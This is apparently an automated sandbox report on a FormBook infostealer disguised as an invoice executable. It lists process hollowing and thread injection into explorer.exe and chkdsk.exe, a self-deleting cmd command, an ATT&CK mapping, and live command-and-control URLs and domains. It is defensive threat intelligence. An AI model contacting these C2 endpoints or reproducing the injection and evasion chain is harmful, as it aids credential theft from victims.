Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_00403019 SetUnhandledExceptionFilter,	0_2_00403019
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_004032E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004032E2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_00402E84 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00402E84
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_00406EB1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00406EB1

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 81.17.29.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.20.84.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 1.1.1.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.zombiguitar.com
Source: C:\Windows\explorer.exe	Network Connect: 85.13.128.31 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.quranvisor.com
Source: C:\Windows\explorer.exe	Domain query: www.bavarian-luxury.com
Source: C:\Windows\explorer.exe	Domain query: www.17391000.com
Source: C:\Windows\explorer.exe	Domain query: www.unusualdog.com
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.microprojects.net
Source: C:\Windows\explorer.exe	Domain query: www.theblockmeatstore.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Section loaded: unknown target: C:\Users\user\Desktop\INVOICE_90990_PDF.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 3472	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 2B0000

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process created: C:\Users\user\Desktop\INVOICE_90990_PDF.exe 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'	Jump to behavior

Source: explorer.exe, 00000005.00000000.252405785.00000000089FF000.00000004.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000005.00000000.236101188.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 0_2_0040312B cpuid

0_2_0040312B

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 0_2_00402D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00402D70

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Virtualization/Sandbox Evasion2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection512	LSASS Memory	Security Software Discovery141	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing11	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery112	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INVOICE_90990_PDF.exe	34%	Virustotal		Browse
INVOICE_90990_PDF.exe	33%	ReversingLabs	Win32.Spyware.Noon
INVOICE_90990_PDF.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.1.INVOICE_90990_PDF.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.INVOICE_90990_PDF.exe.3970000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.INVOICE_90990_PDF.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
topelk.com	0%	Virustotal	Browse
td-balancer-euw2-6-109.wixdns.net	0%	Virustotal	Browse
www.quranvisor.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
www.microprojects.net/usvr/	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.theblockmeatstore.com/usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S	100%	Avira URL Cloud	malware
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.zombiguitar.com/usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.bavarian-luxury.com/usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.unusualdog.com/usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
topelk.com	184.168.131.241	true	true	0%, Virustotal, Browse	unknown
www.zombiguitar.com	81.17.29.150	true	true		unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	false	0%, Virustotal, Browse	unknown
www.quranvisor.com	1.1.1.1	true	true	1%, Virustotal, Browse	unknown
www.microprojects.net	52.20.84.62	true	true		unknown
www.bavarian-luxury.com	85.13.128.31	true	true		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
www.priormakers.net	unknown	unknown	true		unknown
www.topelk.com	unknown	unknown	true		unknown
www.theblockmeatstore.com	unknown	unknown	true		unknown
www.17391000.com	unknown	unknown	true		unknown
www.unusualdog.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.microprojects.net/usvr/	true	Avira URL Cloud: safe	low
http://www.theblockmeatstore.com/usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S	false	Avira URL Cloud: malware	unknown
http://www.zombiguitar.com/usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S	true	Avira URL Cloud: safe	unknown
http://www.bavarian-luxury.com/usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S	true	Avira URL Cloud: safe	unknown
http://www.unusualdog.com/usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
81.17.29.150	www.zombiguitar.com	Switzerland	51852	PLI-ASCH	true
52.20.84.62	www.microprojects.net	United States	14618	AMAZON-AESUS	true
1.1.1.1	www.quranvisor.com	Australia	13335	CLOUDFLARENETUS	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	false
85.13.128.31	www.bavarian-luxury.com	Germany	34788	NMM-ASD-02742FriedersdorfHauptstrasse68DE	true
35.246.6.109	td-balancer-euw2-6-109.wixdns.net	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	461656
Start date:	09.08.2021
Start time:	13:07:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INVOICE_90990_PDF.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/0@9/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 17.7% (good quality ratio 16.6%) Quality average: 78.8% Quality standard deviation: 29.6%
HCA Information:	Successful, ratio: 96% Number of executed functions: 69 Number of non-executed functions: 44
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 131.253.33.200, 13.107.22.200, 23.211.6.115, 52.147.198.201, 23.211.4.86, 20.82.210.154, 8.253.207.121, 8.238.85.126, 8.253.95.120, 67.26.81.254, 67.26.75.254, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.50.102.62 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
81.17.29.150	Banco do Brasil_eDeclara#U00e7#U00e3o_SMX_046_6-08-2021_SWIFT.COPY.exe	Get hash	malicious	Browse	www.davidcavanaghreplays.com/chad/?oXk4W=GgYSJSvMHsKMFJO0ibNkRuU2eCxVRUw1nNslK6tJxGgbeBsaXERfP4haYtmoCzHCd3w8&Wxlp=JlrHNvBX8PPd
81.17.29.150	vbc.exe	Get hash	malicious	Browse	www.chanek4.com/att3/?JL08lH=PtsJsfmLnlGcc8oAUO2qH1sUTLjvoHPXhm+BWlbc0OJ+efHHuxe2x+lBsbLPmCwxxgby&D4=1b_X3Nx8j8V
52.20.84.62	INVOICES.exe	Get hash	malicious	Browse	www.bonacrypto.com/m6b5/?-Zp8=-ZlHGDg&6lm89hn=rxQWzRi4/GDbZhJubG3q4a1cJFG0DuydzIPYWCAWrdQLHPJ4K/oOn5scLamtmNSjLxbR
	PO#00009_PDF.exe	Get hash	malicious	Browse	www.microprojects.net/usvr/?hPj=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91gn8iZriLesw&9rHXU=1b2Tm4z0
	SIWFT COPY_080421_PDF.exe	Get hash	malicious	Browse	www.microprojects.net/usvr/?v6=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91gnW9pbiPckw&3f=9rQtsJ
	JFBlvEr5H9.exe	Get hash	malicious	Browse	www.aideliveryrobot.com/p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8
	ORDER_0009_PDF.exe	Get hash	malicious	Browse	www.microprojects.net/usvr/?UTeX=0nvlV2GPCB&r6=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3
	PO_0008.exe	Get hash	malicious	Browse	www.microprojects.net/usvr/?T4Vtm=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91gn8iZriLesw&mD=3f2XLdWh
	AKG Upgrade Project HP Flare Tip 2018-08311SP-01 R1.exe	Get hash	malicious	Browse	www.deluxeluxe.com/um8e/?D0Dhj=tQxxJThvRlF7uoOgmKtpnJxKPLvD7BbNwQKdj7BVp8iUEZTiqea3Amb+hFcdLgzdK8CzQxtKUQ==&SpK=0RphU8o
	Order210622.exe	Get hash	malicious	Browse	www.brilliantpeople.net/rnn4/?0THhF=qhW2N+OENxuMgY6BQaqBOu4zVUVJPBlL429j4mgTcKLmbUhdjsUCZCU6ULuIPrPPYOxR&8pwDR8=e8n098fX
	PO#8076.exe	Get hash	malicious	Browse	www.trexzin.com/bdIo/?X48Tg=jAEoepUnyJD91hGIbt2H4UvT4GD8W6JahuuTP0mS336S1qZTdyjn+n+zKoIxJBcmVMCk&crht=2dW4nLD0NtvHXLw
	WP7IsjaUga.exe	Get hash	malicious	Browse	www.shopcovetandcrave.com/xkcp/?8pN=meM2OjwkY62wSDZXdg/l66lNbQP+VMltxyXirsNu53DvjKPfmqUuxV1+NEGS4eI+DGZeUAgzkg==&j48=cXRx_BcH
	Import Custom Duty invoice & its clearance documents.exe	Get hash	malicious	Browse	www.shopilyzer.com/hdno/?k6AL=bX2LslV8_8H&5jUh5Lj=vAHjBshrQY90wbP6wYuAGGrsBv3yB0uVhINcxtb/jdclzZG+1EkiLuqYoGnk5rONj/yr
	quote.pdf.exe	Get hash	malicious	Browse	www.pheki.com/owws/?RR=hW6PN3g+bwFsTqYxfcMdFyeWy4Tbl5JsVDeq1KYqt17Exinv6hntH0if2hhU24Mi3HAxD4apXQ==&rVEx8D=S0GhCH
	bin.exe	Get hash	malicious	Browse	www.aideliveryrobot.com/p2io/?uN9hQ=ejlP_vuP4dl4N6&qFQl7Pf8=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ
	Ac5RA9R99F.exe	Get hash	malicious	Browse	www.fydia.com/evpn/?CZa4=U0Pdmtql4+VvPQSQ+Swt/ksTplWHB0r6aeBNER6H7DGyqmGYWZ07p8SdnjAA6A5mLpns&CPWhW=C8eHk
	Calt7BoW2a.exe	Get hash	malicious	Browse	www.fydia.com/evpn/?Dxoxa=ZRmh28X82b&kzrxPDG=U0Pdmtql4+VvPQSQ+Swt/ksTplWHB0r6aeBNER6H7DGyqmGYWZ07p8Sdngg6qRZeROGr
	invoice.exe	Get hash	malicious	Browse	www.widedepot.com/ch65/?uDKD=JuzkL7T4LUnZTQsUlWd3pHkHj4YuC1s7udC2v9/pP6vadqV25YE+uBd9xvjli+Qg28+H&1bd0lZ=gvRpZrK08tSP66
	pVXFB33FzO.exe	Get hash	malicious	Browse	www.thrivezi.com/bw82/?BRAh4F=3XAKDXBTzYl+7eF3IcS+nDMUHIb0m9P0UUgWBFY1xibMAyIvduB5azogqQPpRVdFOyxC&VR-T8=l6AlF0u814LH_Lj

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.zombiguitar.com	PO_0008.exe	Get hash	malicious	Browse	81.17.18.194
www.microprojects.net	PO#00009_PDF.exe	Get hash	malicious	Browse	52.20.84.62
	SIWFT COPY_080421_PDF.exe	Get hash	malicious	Browse	52.20.84.62
	ORDER_0009_PDF.exe	Get hash	malicious	Browse	52.20.84.62
	PO_0008.exe	Get hash	malicious	Browse	52.20.84.62
www.bavarian-luxury.com	ORDER#710665_PDF.exe	Get hash	malicious	Browse	85.13.128.31
	ORDER_0009_PDF.exe	Get hash	malicious	Browse	85.13.128.31
	PO_JAN907#092941_BARYSLpdf.exe	Get hash	malicious	Browse	85.13.128.31
ext-sq.squarespace.com	New Order08082021.exe	Get hash	malicious	Browse	198.185.159.144
	Enquiry.exe	Get hash	malicious	Browse	198.185.159.144
	BztewsF51y.exe	Get hash	malicious	Browse	198.185.159.144
	QT 20210508.xlsx	Get hash	malicious	Browse	198.185.159.144
	PURCHASE ORDER 2070121 SN-WS.PDF.EXE	Get hash	malicious	Browse	198.185.159.144
	Cct8CiOtJ7.exe	Get hash	malicious	Browse	198.185.159.144
	0xwLkq8iyp.exe	Get hash	malicious	Browse	198.185.159.144
